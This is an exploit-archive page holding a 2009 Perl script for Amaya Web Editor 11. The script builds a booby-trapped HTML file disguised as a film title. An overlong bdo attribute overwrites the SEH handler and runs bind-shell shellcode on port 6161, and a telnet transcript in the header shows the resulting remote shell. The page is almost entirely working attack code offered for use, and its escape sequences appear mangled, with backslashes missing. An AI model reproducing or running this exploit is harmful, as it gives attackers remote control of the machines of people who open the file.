[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Amaya Web Editor 11 Remote SEH Overwrite Exploit
# Published : 2009-01-30
# Author : LiquidWorm
# Previous Title : NaviCopa webserver 3.0.1 (BOF/SD) Multiple Remote Vulnerabilities
# Next Title : Synactis All_IN_THE_BOX ActiveX v3 Null byte File Overwrite Vuln
#!/usr/bin/perl
#
# Title: Amaya Web Editor 11 Remote SEH Overwrite Exploit
#
# Summary: Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web.
#
# Product web page: http://www.w3.org/Amaya/
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Reference: http://www.milw0rm.com/exploits/7906
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# 30.01.2009
#
#------------------------------------------------------------------
#
# lqwrm@zeroscience:~$ telnet 192.168.1.101 6161
# Trying 192.168.1.101...
# Connected to 192.168.1.101.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesAmayaWindowsWXbin>dir
# Volume in drive C is System
# Volume Serial Number is D484-8540
#
# Directory of C:Program FilesAmayaWindowsWXbin
#
# 29.01.2009 19:27 <DIR> .
# 29.01.2009 19:27 <DIR> ..
# 16.12.2008 14:44 5.816.320 amaya.exe
# 16.12.2008 14:41 1.290.240 thotprinter.dll
# 19.08.2008 11:02 135.168 wxbase28u_net_vc_custom.dll
# 19.08.2008 11:01 1.220.608 wxbase28u_vc_custom.dll
# 19.08.2008 11:02 135.168 wxbase28u_xml_vc_custom.dll
# 19.08.2008 11:03 741.376 wxmsw28u_adv_vc_custom.dll
# 19.08.2008 11:03 286.720 wxmsw28u_aui_vc_custom.dll
# 19.08.2008 11:01 3.018.752 wxmsw28u_core_vc_custom.dll
# 19.08.2008 11:02 49.152 wxmsw28u_gl_vc_custom.dll
# 19.08.2008 11:02 524.288 wxmsw28u_html_vc_custom.dll
# 19.08.2008 11:03 593.920 wxmsw28u_xrc_vc_custom.dll
# 11 File(s) 13.811.712 bytes
# 2 Dir(s) 7.520.141.312 bytes free
#
# C:Program FilesAmayaWindowsWXbin>
#
#------------------------------------------------------------------
my $start = "<html>" . "n" . '<bdo dir="' . "n";
my $junk = "x41" x 10556;
my $seh = "xc5x87x85x7c"; #0x7c8587c5 pop pop ret kernel32.dll - (SE handler) - EIP
#0x7c941eed jmp esp kernel32.dll
#0x7c836960 call esp kernel32.dll
#0x7c85d568 call esp kernell32.dll
# ...
my $next_seh = "xebx06x90x90"; #0x909006eb jmp+0x06 - (Pointer to next SEH record)
my $nop = "x90" x 50;
# win32_bind - EXITFUNC=seh LPORT=6161 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $sc = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb0".
"x6bx3ax1ex83xebxfcxe2xf4x4cx01xd1x53x58x92xc5xe1".
"x4fx0bxb1x72x94x4fxb1x5bx8cxe0x46x1bxc8x6axd5x95".
"xffx73xb1x41x90x6axd1x57x3bx5fxb1x1fx5ex5axfax87".
"x1cxefxfax6axb7xaaxf0x13xb1xa9xd1xeax8bx3fx1ex36".
"xc5x8exb1x41x94x6axd1x78x3bx67x71x95xefx77x3bxf5".
"xb3x47xb1x97xdcx4fx26x7fx73x5axe1x7ax3bx28x0ax95".
"xf0x67xb1x6exacxc6xb1x5exb8x35x52x90xfex65xd6x4e".
"x4fxbdx5cx4dxd6x03x09x2cxd8x1cx49x2cxefx3fxc5xce".
"xd8xa0xd7xe2x8bx3bxc5xc8xefxe2xdfx78x31x86x32x1c".
"xe5x01x38xe1x60x03xe3x17x45xc6x6dxe1x66x38x69x4d".
"xe3x38x79x4dxf3x38xc5xcexd6x03x22x0fxd6x38xb3xff".
"x25x03x9ex04xc0xacx6dxe1x66x01x2ax4fxe5x94xeax76".
"x14xc6x14xf7xe7x94xecx4dxe5x94xeax76x55x22xbcx57".
"xe7x94xecx4exe4x3fx6fxe1x60xf8x52xf9xc9xadx43x49".
"x4fxbdx6fxe1x60x0dx50x7axd6x03x59x73x39x8ex50x4e".
"xe9x42xf6x97x57x01x7ex97x52x5axfaxedx1ax95x78x33".
"x4ex29x16x8dx3dx11x02xb5x1bxc0x52x6cx4exd8x2cxe1".
"xc5x2fxc5xc8xebx3cx68x4fxe1x3ax50x1fxe1x3ax6fx4f".
"x4fxbbx52xb3x69x6exf4x4dx4fxbdx50xe1x4fx5cxc5xce".
"x3bx3cxc6x9dx74x0fxc5xc8xe2x94xeax76x40xe1x3ex41".
"xe3x94xecxe1x60x6bx3ax1e";
my $end = '">' . "n" . "t00t</bdo>" . "n" . "</html>";
my $file= "Slumdog_Millionaire.html";
$payload = "$start" . "$junk" . "$next_seh" . "$seh" . "$nop" . "$sc " . "$end";
open (exploit, ">./$file") or die "Can't open $file: $!";
print exploit "$payload";
close (exploit);
print "tn - $file successfully created!n";
# www.Syue.com [2009-01-30]